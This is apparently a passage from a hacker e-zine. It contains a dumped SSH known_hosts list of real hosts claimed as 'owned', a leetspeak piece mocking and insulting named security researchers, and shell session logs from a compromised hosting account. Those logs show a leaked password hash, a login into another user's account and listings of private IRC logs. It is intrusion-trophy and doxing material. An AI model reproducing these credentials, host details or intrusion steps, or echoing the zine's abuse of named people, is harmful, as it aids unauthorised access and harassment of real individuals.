ffm-game14.stormix.de,62.4.81.253 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
ffm-game79.stormix.de,62.4.74.249 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
ffm-game68.stormix.de,62.4.74.238 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
ffm-voice03.stormix.de,62.4.74.147 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArgJpfj0gyOSe7n5U55OgPXLWsjE/E6S1WaMOEHQHMaU56OG3+1DRK+RPW5qZOpf8esNEmCc/t4kHnrHaOamXGpdWjGOAA7F5U863MteYrad+YEb/YL4PmbMndgZL30cDcGOHlo3O9mki0NvJfbk/6Z+vpvSuw564l7AxGV+3NsU=
62.4.81.246 ssh-dss AAAAB3NzaC1kc3MAAACBALOU+2RQ+PbLZ6yyWm5RQhXGTC7ImRQIe6xJe2v+ZAcSkyNe18Vl/HDKp4G4j4oeNHGoJlVY+bhwSgT6EviaXPfAQwzZ+3ZlmwZPbT86BtAMHRpaf/nFmdln7mLVRRLplEh0MCCg2Sv1DUcPXVAH55Tblc0rIMWPCc+Ofotq41tpAAAAFQCVbQo5wGmkzVBtKOLjKtEEGl7GbwAAAIB0jtV+QduqOxW1UaULRYpr57nNj9l/tw+CWbcOora3ylzUIRpEeHsdMB+Pjr3G4KBRyVzDaLSaGlN2BpZNbApF09ApQhjyTlngP3pGwVh4WA49XFupnfVRu+0h2l8lc5Uh2870OlhZY28b2XZtoZu23yidhwiP/yGe8EWFe41dVQAAAIA/aFaxA1N64ySjsepeTsoqfUbsQKj8xVkbSLTbf6ubW/DKiJLw7qduETsCbV4MvgP0PmmhshIA1otKXRGAKwtBGb/eqArQ7yAF97PmnXyCoMoI2WjmyXMQEEfqIN3fAQ0q+Mpn/m/Qn1Dic6MzeWWn2m0d7nZ+N9H4K0AOgNGkTA==
62.4.81.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
62.4.81.237 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzWoI9ngsm2KJGG3g/MeOT3lLkDuqAlxRENt13DbTB0qft38IoezzeO0HZC0knELmw52VGM4t2Jshc6tnDYqvaGWwLMilCWTWS1q8CsqBsjvqmz6gMBblz3P+dsvNwv0hRjB06k52YLIiNdEoUeRwBh4j1yxyKh0F4+GxIo67Unc=
62.93.205.29 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
62.4.81.211 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
62.93.205.9 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
62.4.81.200 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
62.4.74.142 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
trouble.de-punkt.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
62.4.74.135 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2N2kJndwU/m2yh5OtDibxelAcB7MdVitzGoFUr1AJOlC/bw6oQ+jcwZvEEk6E+ZhlB333E/qr/jzJUKjVePZkd8ZHvVxaCHwWlqg9VsDzd16FwcNdld9NKPCYyxsfaC454F8r1qJ0Tmr5tAunCgx2tGNWM97xfOtDcxH21ylWec=
filoo.filoo.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvsddMVBbpQSDlZ3DqQ2GDtc5SXff1QfJ2qia05h8Z5NYsitFU4NUj7+9nk8xAYoVmg+TJBY2OoFq/Y+dqbfZe6gADwcGj/oG+njsDhhxJQcsRaj/l2ePe6fNRdoXTqEx49VS9PMBg761aXd2WfibQDjSuuvIcsg7pinXRRUwfts=
62.93.205.39 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
62.4.74.145 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAu4t+GhNVrwqnsEGtncts9sGz6bdwVZMItXv/XbjQHeTGwjVHbG03QE7dm4mFg5U9j8yXPqAyM61GnhrM2a4RccaYWinVqdLwTu8t63rEDn0IIYOmk2JHdqHNnJLRNTdFwwP9vk5WvmOMp28+3kpyXYVCixcXHGorp42W/NYyoUM=
62.4.81.214 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1r0iM1QsKyCO6dkIcuo71gGe43FTY9WL0cvHoce4Ogf4JiSBXr/nbDHOEOsHi6VO6Ue4qhbAAZbvDD3FxMcFin3/1pGAmesw27sU8HwBrjkK1r/LyeclK8u4FuO9fKYP0eE8QkU7ESttSULVSM+UWp3xM2ZCh6TVrh9uWFZF57s=
62.4.81.217 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr3FBwUshy8ny9Tlqd5/NWa6OMolmKhDcpAmtfzCMR21piN4IufDy6cms85YVdKhuyAmkmu+aUZ836HwEpmXcoQR0DxOXORm2MX9t/GU2j3fS9QsDF1KwOWy3NYNmHpAMt7bk0EklWwB96RSjjGNhJ3md/SoPY/I2lhMzOKK1u9k=
www-3.de-punkt.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
absynth.de,62.4.81.207 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4JpgXGT7/BeGFLndfDWZLeiA5/ZiHDY4Be6A0zBZisLq3YtjP2m7Ylc6gOsAIhQsSEY1W8W8cIkSftKckjWp27cRsS5Iw2XsiGJ52CA3IyZf8ZSQovTZRMVZbegfDR9EKgZj9x/OayObFAzLJcDUD8d/Ex9pFjnwl7WxURy+jRU=
62.4.74.233 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
62.93.205.61 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA5GCD9v4lYZI8uzPHSNTnP5tbAG+L2fM3SohgCPrkOz5qwcJbimYOChOJ1nn8Fu4XjHn1GuznF3Yt3kJmiwtPdx/5nof1ddx8PiacpZ3CnOcAb0ZdHHtCc4lF2x0j0KsyIwaPbxX1cG8rzJN1Igz172IOlvaKKux+fvDehG2RZY0=
62.93.205.71 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtxZfk9D5AYL0ANMVkvp8O38p3EPxUBNZEIhyi9yesQFn0Ad83fInDDgLu+ZaOcAZi8kxROAcxyDuye/nNx0jAs24C6cHyBE5YWbe4341NT/8u1BTq87XVXmD965W1oMJ1dr7k9UvdAUJSvSs5rwIANsQU9SJMbJ/AxjjLsWEvQs=
192.168.1.133 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2N2kJndwU/m2yh5OtDibxelAcB7MdVitzGoFUr1AJOlC/bw6oQ+jcwZvEEk6E+ZhlB333E/qr/jzJUKjVePZkd8ZHvVxaCHwWlqg9VsDzd16FwcNdld9NKPCYyxsfaC454F8r1qJ0Tmr5tAunCgx2tGNWM97xfOtDcxH21ylWec=
62.4.74.155 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtqZ4cJ1xwKSdvojslsht7sflxg/jbazCtpykVLlGQmnStIEitMyqpPfeVqtnBpAIMYxWrSI2Znkps4Eolr1JziYt4stT1LHci3xQwZh7GStbMrCf00nT/JSMwNwEo3xPCLxYEJb3p7yl77nFi9dG0e7Llc9Cy1WSemsBR3nH63s=
62.4.74.136 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2N2kJndwU/m2yh5OtDibxelAcB7MdVitzGoFUr1AJOlC/bw6oQ+jcwZvEEk6E+ZhlB333E/qr/jzJUKjVePZkd8ZHvVxaCHwWlqg9VsDzd16FwcNdld9NKPCYyxsfaC454F8r1qJ0Tmr5tAunCgx2tGNWM97xfOtDcxH21ylWec=
ffm-game17.stormix.de,62.4.81.232 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
ffm-game11.stormix.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
62.93.205.30 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k=
62.4.74.224 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtnAl3sTQqLE2TX4OMga1fL243tvF3vujgyI+P2EzKcKdjYNGbLnI7Yb6UU1AGwSI/UYfngj34L9iXhJtOmDTFPYT4zN9jPsJdr5tK9BQkE96Ub9j+eAM5YAO80mOveIxbn1mR/DyIiV3eEIo4rO7ptlrxqNWZioxnO8iPPszWvs=
mail.de-punkt.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAmGMUnbdKqgeplS/3CTURHknAJ1AEoBE5OJqecBdUrjmCShytmag6hfwJvez7jjBU4Ov7yZksFxMlCrjrlpVSm1BlLhI7b81vtPHHqo1md1WlgOjP6OhHCeVo3KlcHXtWUlT4Sh7I6pKO3IZ239MSAOUoIKcZd0mMAdjdOwnX8Bk=
62.4.81.208 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv+jNJxnsPOIxXW5c7FYS2rs4fNtqXrJ+b1qKxinbGMaoRw/ZyW4iOYb+grpXp3pQrKNe155+dUEm+4ylObvW4NBF+JJkoTWshIodcJy4KK2un2mRwKGAuGV+GGHniU3R8xsVIslUfKllA4qP5b9EHd5A1sQrF2t/mkKHLT3WUpk=
mx-10.loretis.com,62.93.205.83 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr3FBwUshy8ny9Tlqd5/NWa6OMolmKhDcpAmtfzCMR21piN4IufDy6cms85YVdKhuyAmkmu+aUZ836HwEpmXcoQR0DxOXORm2MX9t/GU2j3fS9QsDF1KwOWy3NYNmHpAMt7bk0EklWwB96RSjjGNhJ3md/SoPY/I2lhMzOKK1u9k=
^
--- w3 0wn3d 4ll th3s3.

v3nd0r n0t1f1c4t10n:
no fix on 0day.

th4nkz t0 kunz (aka absynth) 0f th3 h4rd3n3d-php s3cur1ty t34m f0r 4ll0w1ng h1z
s1t3 t0 run l1k3 3v3ry vuln3r4bl3 w3b4pp 1n th3 l4zt 6 y34rz & f0r b31ng t0
stup1d t0 fuck1ng n0t1c3 th3 br34k 1n.


26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd

4ud1t1ng th3 h4q3r m1nd.
by MRH- (H 1z 4 h4q3r!)

h3y h3y h3y!!! w3lc0m3 t0 my t3xt 1n th3 h0no z1n3. 3y3 y4m t00 stup1d t0 wr1t3
a full b00k, s0 h0no l3t m3 wr1t3 th1z sh0rt t3xt s0 th4t th3 s3cur1ty w0rld
w1ll kn0w h0w t0 sp0t a tru3 h4q3r. f1rzt th1ng t0 kn0w.. h4q3rz r 0n uz3n3t.
s3c0nd.. h4q3rz uz3 c0d3z. th1rd.. 3y3 y4m a h4q3r!!! h4 h4 h4.

-~-~-~

n0w l3tz b3g1n. h4q3r subj3ct numb3r 0n3: HDM (H4lf D3v3l0p3d M1dg3t)

th1z h4q3r st4ndz t4ll @ 5 ft 1 1nch3z. d0nt l3t h1z g3ll3d h41r f00l y0u, h3 tru3ly 1z
tr41l3r p4rk tr4sh. tr33t0p tr41l3r p4rk 1z wh3r3 h3 1zt l34rn3d t0 c0d3. 1t w4z th3r3
th4t th3 m1dg3t m3t h1z l1f3 t1m3 c0mp4n10n & c0d1ng buddy, sp00nm. t0g3th3r th3y s4t
4r0und 4 d4yz try1ng t0 h4q 1mmun1tys3c, but s33mz l1k3 th3y c0uldnt must3r th3 4b1l1t13z.
th3r3 c4z3 1z tru3ly un1qu3 1n th4t 1nzt34d 0f g1v1ng up t0 b3c0m3 a du0 0f m4l3 str1pp3rz
th3 t34m w3nt 0n t0 b3c0m3 w0rld f4m0uz 4uth0rz 0f th3 m3t4spl01t pr0j3ct!! 3y3 p3rs0n4lly
h4v3 uz3d th1z t00l t0 d0 4ll 0f my h4q1ng.

3y3 c4ught up w1th th3 gr34t HDM & sp00nm @ d3fc0n l4zt y34r. h3r3 1z 4 gl1ms3
1nt0 th31r w0rld.

HDM: "I beat up little kids and then spike my hair."
spoonm: "my mother beat me."

4z y0u c4n s33, th3r3 1z a r34s0n th3z3 2 h4lf br41n3d h4q3rz s33k m0r3
4tt3nt10n th4n r3dp4ntz 0n a sug4r buzz! 1f y0u h4v3 s33n 0r h34rd fr0m
sp00nm'z m0th3r, plz c0nt4ct MRX@whatever-company-kf-is-currently-failing-at.com

-~-~-~

n3xt subj3ct 1z a w3ll kn0wn s0uth 4fr1c4n h4q3r by th3 n4m3 0f awk.

awk 1z kn0wn t0 ch3w 0n pur3 st33l t0 h3lp "t0ugh3n up" h1z gumz. h3 41nt t0
puzzy! 3y3 0nc3 w4tch3d h1m k1ckb4n kokanin fr0m #darknet!! 1t 1z rum0r3d th4t
awk'z d1q c4n w1thst4nd t0rtur3z 0nly pr3v10uzly kn0wn t0 b0b fl4n4g4n. h0w much
0f th1z m4n 1z myth th0ugh? I c4ught awk 0n th3 3r1z fr33 ch4t n3tw0rk t0 4sk
h1m a qu3st10n..

<MRH-> h0w b1g r y0ur b4llz do0d?
<awk> GFRRRRAWWWLL!!@#!@# ME BALLS !@#!@# HURT!!!!@#!@#! GRRRRRRWAAWWWWLL!L@#
<awk> FEED AWK!@#!@# PROTIEN!!!!##
<awk> GRRRAAWWRRRLLL!!!#$#$%%%

th3 0nly l0g1c4l 4ssumpt10n 0n3 c4n m4k3 1z th4t awk w4z l4t3 1n d3c3nd1ng fr0m
th3 4p3 f4m1ly, 4ls0 h1z l0w 1q t3llz uz th4t h3 pr0b4bly h4z a m1zz1ng
chr0m0z0m3.

-~-~-~

0ur f1rzt tru3ly m4rv4louz subj3ct g03z by th3 h4ndl3 agntorng.

unl1k3 th3 def0l14nt, th1z agntorng 1z h4rml3zz. g1v3n th3 ch01c3 b3tw33n h4q1ng
& m4k1ng upst0r13z th1z 1nt3rn3t h3r0 w1ll p1q st0ryz 3v3ryt1m3! wh4t a h4q3r!
1z 1t th4t h3 c4nt h4q? 1z 1t th4t h3 1z a "p0z3r" 4z h3 w0uld s4y? 3y3 th1nk
s0! 1t 1z my c0nclus10n th4t s0m3 hum4nz, g1v3n 3n0ugh l4m3n3zz 4dd3d t0 th31r
3nv1r0nm3nt phys1c4lly c4nn0t h4q!! b31ng th4t agntorng h4z b33n 3xp0z3d t0 th3
d4rp4 1rcd f0r 4n 3xt3nd3d 4m0unt 0f t1m3.. 3y3 b3li3v3 h3 1z h4q1ng imp0t3nt!
3y3 4sk3d agntorng th1z wh3n h3 w4z 0n mushr00mz 1rc1ng fr0m an 0wn3d sh3ll b0x.

<agntorng> I cant feel my legs.
<agntorng> I think h0no hacked them!
<agntorng> oh well.. I'll sit around an irc tomorrow.

h0no d1d n0t h4q th3m. 1t turnz 0ut th4t agntorng 1z suff3r1ng fr0m wh4t w3 1n
th3 buz1n3zz c4ll "p4r4n01d 3y3 y4m h4q3d syndr0m". h3 b3l13v3z th1z t0 such 4n
3xt3nt th4t h3 0ft3n t1m3z sw1tch3z sh3llz 3 t0 4 t1m3z 4n h0ur juzt 1nc4z3 h0no
0wnz a b0x.

h0no h4z 1nf0rm3d m3 th4t f0ll0w1ng agntorng'z gu1d3 t0 4dv01d1ng g3tt1ng 0wn3d
w1ll 0nly result 1n m0r3 st34lthy m3th0dz f0r b4qd00r1ng. 4nd th3y w1sh t0 4sk
h1m th1z "how long were you fuqn owned for?" th3y b3li3v3 th3 4nsw3r 1z "to
this day."
s1nc3 3y3 y4m 4n 3xp3rt @ 4n4lys1s, 3y3 w1ll d3t3rm1n3 th4t th3y m34n
t0 s4y:

AGNTORNG. YOU ARE OWNED!!! HAR HAR HAR!!!@#


27.txt -~-~-~ DVDM4N 1Z A FUQN FR34K!!@#

b3 f0r3w4rn3d. th1z 1z th3 gr34t3zt h4q 3v3r t0 t4k3 pl4c3 0n th3 1nt3rn3t. w3
4lm0zt f33l b4d f0r d01ng th1z t0 4n0th3r hum4n b31ng...

-~-~-~
h0no pr3s3ntz... DVDMAN 1Z A FUQN FR34K!!@#
-~-~-~

w3 w1ll st4rt y0u 0ff w1th dvdman's light.volthost.net 4cc0unt:

$ ls -al
total 105458
drwx--x--- 9 dvdman free 1024 Jul 10 02:40 .
drwxr-xr-x 97 root wheel 2048 Jul 20 22:55 ..
drwx------ 3 dvdman free 512 Jun 21 00:10 .BitchX
-rw------- 1 dvdman free 17075 Jul 10 12:30 .bash_history
-rw-r--r-- 1 dvdman free 771 Apr 21 2005 .cshrc
drwx------ 2 dvdman free 512 Jul 4 13:28 .irssi
-rw-r--r-- 1 dvdman free 255 Apr 21 2005 .login
-rw-r--r-- 1 dvdman free 165 Apr 21 2005 .login_conf
-rw------- 1 dvdman free 371 Apr 21 2005 .mail_aliases
-rw-r--r-- 1 dvdman free 331 Apr 21 2005 .mailrc
-rw------- 1 dvdman free 606 May 11 2005 .mysql_history
-rw-r--r-- 1 dvdman free 45 May 12 2005 .passwd
-rw-r--r-- 1 dvdman free 801 Apr 21 2005 .profile
-rw------- 1 dvdman free 276 Apr 21 2005 .rhosts
-rw-r--r-- 1 dvdman free 852 Apr 21 2005 .shrc
drwx------ 2 dvdman free 512 May 6 2005 .ssh
-rw-r--r-- 1 dvdman free 786432 Jul 10 01:37 X-05BL_060609_352eubx_api_au_1.bin
drwxr-xr-x 2 dvdman free 512 Jun 22 2005 gals.fraek.com
-rw-r--r-- 1 dvdman free 7188480 Jun 22 2005 galsfraek.tar
-rw-r--r-- 1 dvdman free 73474 Jul 10 01:07 n2edit_beta9.zip
drwxrwxrwx 2 dvdman free 512 May 5 2005 output
drwxr-xr-x 9 dvdman free 512 Jun 21 01:29 public_html
-rwxr-xr-x 1 dvdman free 184 May 5 2005 run.sh
-rw-r--r-- 1 dvdman free 99788800 Jun 22 2005 sexyfreak.tar
drwxr-xr-x 4 dvdman free 512 Sep 12 2005 vidaguerra
$ cat .passwd
dvdman:$apr1$7dGho/..$kvC5BJc11zxk3qEnokOYg/
-bash-3.00# ssh johnh@light.volthost.net
-

All failed password attempts are logged.
We will report multiple failed attempts.

-
johnh@light.volthost.net's password:
$ id
uid=2111(johnh) gid=2000(free) groups=2000(free)
$ ps aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 85874 0.0 0.1 1852 1448 ?? Ss Wed03PM 0:05.43 screen
johnh 95791 0.0 0.3 8356 5536 q2 S+ Thu02PM 0:34.52 irssi -h rate.limi
johnh 65902 0.0 0.1 1868 1500 pq Is+ Thu08AM 0:00.06 /usr/local/bin/bas
johnh 85875 0.0 0.1 1820 1424 q2 Is Wed03PM 0:00.01 /usr/local/bin/bas
johnh 35056 0.0 0.0 400 236 ?? R 5:05PM 0:00.00 ps aux
$ ls -al
total 118
drwx--x--- 9 johnh free 512 Jun 27 12:31 .
drwxr-xr-x 97 root wheel 2048 Jul 20 22:55 ..
drwx------ 3 johnh free 512 Jun 21 02:19 .BitchX
-rw------- 1 johnh free 10301 Jul 21 15:48 .bash_history
-rw-r--r-- 1 johnh free 771 Jun 21 00:29 .cshrc
drwx------ 2 johnh free 512 Jul 4 22:25 .irssi
-rw-r--r-- 1 johnh free 255 Jun 21 00:29 .login
-rw-r--r-- 1 johnh free 165 Jun 21 00:29 .login_conf
-rw------- 1 johnh free 371 Jun 21 00:29 .mail_aliases
-rw-r--r-- 1 johnh free 331 Jun 21 00:29 .mailrc
-rw------- 1 johnh free 32 Jun 21 17:46 .mysql_history
-rw-r--r-- 1 johnh free 68 Jun 27 12:32 .passwd
-rw-r--r-- 1 johnh free 801 Jun 21 00:29 .profile
-rw------- 1 johnh free 276 Jun 21 00:29 .rhosts
-rw-r--r-- 1 johnh free 852 Jun 21 00:29 .shrc
drwx------ 2 johnh free 512 Jun 23 15:11 .ssh
drwx------ 5 johnh free 512 Jul 10 08:16 irclogs
lrwxr-xr-x 1 root free 26 Jun 21 00:37 jbhale.com -> /home/www/sites/jbhale.com
-rw-r--r-- 1 johnh free 53626 Mar 27 2004 mb2md-3.20.pl
drwxr-xr-x 4 johnh free 512 Jun 21 09:13 nc
drwxr-xr-x 4 johnh free 512 Jun 21 08:40 others
drwxr-xr-x 2 johnh free 512 Jul 10 01:00 public_html
-rw-r--r-- 1 johnh free 13808 Jun 24 16:57 rom102-v28-rev109-0001-blocker.zip
$ cd irclogs
$ ls -alR
total 10
drwx------ 5 johnh free 512 Jul 10 08:16 .
drwx--x--- 9 johnh free 512 Jun 27 12:31 ..
drwx------ 2 johnh free 512 Jul 4 14:40 scnet
drwx------ 2 johnh free 512 Jul 12 11:10 servercentral
drwx------ 2 johnh free 1024 Jul 20 15:32 uicn

./scnet:
total 3762
-rw------- 1 johnh free 20445 Jul 10 03:00 #!l33tsecurity.log
-rw------- 1 johnh free 954489 Jul 10 03:00 #efnet.log
-rw------- 1 johnh free 2491175 Jul 10 03:00 #nanog.log
-rw------- 1 johnh free 262940 Jul 10 03:00 #voltshells.log
drwx------ 2 johnh free 512 Jul 4 14:40 .
drwx------ 5 johnh free 512 Jul 10 08:16 ..
-rw------- 1 johnh free 381 Jul 4 22:23 alums-.log
-rw------- 1 johnh free 3562 Jul 10 03:30 auth.log
-rw------- 1 johnh free 2153 Jun 27 02:58 dvdman.log
-rw------- 1 johnh free 4217 Jun 24 23:33 joel.log
-rw------- 1 johnh free 163 Jun 29 09:24 kiles-.log
-rw------- 1 johnh free 5678 Jul 8 19:03 momo.log
-rw------- 1 johnh free 262 Jul 2 03:53 sweet}{li.log

./servercentral:
total 288
-rw------- 1 johnh free 2576 Jul 12 09:45 #!l33tsecurity.log
-rw------- 1 johnh free 254953 Jul 12 09:45 #nanog.log
drwx------ 2 johnh free 512 Jul 12 11:10 .
drwx------ 5 johnh free 512 Jul 10 08:16 ..
-rw------- 1 johnh free 2244 Jul 16 23:04 auth.log
-rw------- 1 johnh free 146 Jul 12 11:15 johnh.log
-rw------- 1 johnh free 1375 Jul 12 11:15 sc-notice.log

./uicn:
total 7014
-rw------- 1 johnh free 383 Jul 20 08:42 ##al7bar-help.log
-rw------- 1 johnh free 527 Jun 28 15:22 ##al7bar.tk.log
-rw------- 1 johnh free 720 Jul 20 08:42 #al7bar-help.log
-rw------- 1 johnh free 4795533 Jul 21 17:11 #al7bar.tk.log
-rw------- 1 johnh free 373 Jul 20 08:44 #alt7bar.tk.log
-rw------- 1 johnh free 657717 Jun 29 19:15 #dishnetwork.log
-rw------- 1 johnh free 1307717 Jul 2 00:59 #dss-newbies.log
-rw------- 1 johnh free 369 Jul 2 00:58 #pansat.log
drwx------ 2 johnh free 1024 Jul 20 15:32 .
drwx------ 5 johnh free 512 Jul 10 08:16 ..
-rw-r--r-- 1 johnh free 143669 Jul 20 08:48 A
-rw------- 1 johnh free 3390 Jul 20 08:43 [c3p0].log
-rw------- 1 johnh free 10919 Jul 20 14:50 auth.log
-rw------- 1 johnh free 585 Jul 20 21:40 bar-bee-q.log
-rw------- 1 johnh free 176 Jun 29 01:26 candoo.log
-rw------- 1 johnh free 129 Jun 28 23:46 cra.log
-rw------- 1 johnh free 2276 Jun 29 02:27 crazyhorse.log
-rw------- 1 johnh free 1660 Jul 20 14:44 demigawd.log
-rw------- 1 johnh free 326 Jun 28 22:07 expatriat.log
-rw------- 1 johnh free 181 Jul 20 08:43 ftamoyahua.log
-rw------- 1 johnh free 41700 Jul 20 20:02 global.log
-rw------- 1 johnh free 2765 Jun 29 00:07 hackdss.log
-rw------- 1 johnh free 243 Jun 28 17:32 hackinsat.log
-rw------- 1 johnh free 2701 Jul 20 08:51 huckleberry.log
-rw------- 1 johnh free 974 Jun 26 17:45 huggybear.log
-rw------- 1 johnh free 737 Jun 25 17:50 j.log
-rw------- 1 johnh free 1211 Jul 20 13:51 john.log
-rw------- 1 johnh free 13495 Jul 20 14:50 johnh.log
-rw------- 1 johnh free 4392 Jul 19 20:17 link.log
-rw------- 1 johnh free 160 Jun 25 01:19 moneey.log
-rw------- 1 johnh free 440 Jun 26 15:27 mud.log
-rw------- 1 johnh free 212 Jul 20 14:51 nailer.log
-rw------- 1 johnh free 640 Jun 26 21:37 nexus.log
-rw------- 1 johnh free 16285 Jul 20 14:44 nickserv.log
-rw------- 1 johnh free 4195 Jul 21 01:19 night^owl.log
-rw------- 1 johnh free 10440 Jul 20 13:50 operserv.log
-rw------- 1 johnh free 6240 Jul 20 14:50 opsb.log
-rw------- 1 johnh free 314 Jul 20 15:32 perception.log
-rw------- 1 johnh free 409 Jun 29 01:29 red^neck.log
-rw------- 1 johnh free 325 Jun 28 17:54 rusty.log
-rw------- 1 johnh free 8463 Jul 20 14:50 secureserv.log
-rw------- 1 johnh free 307 Jul 20 14:51 shaggy.log
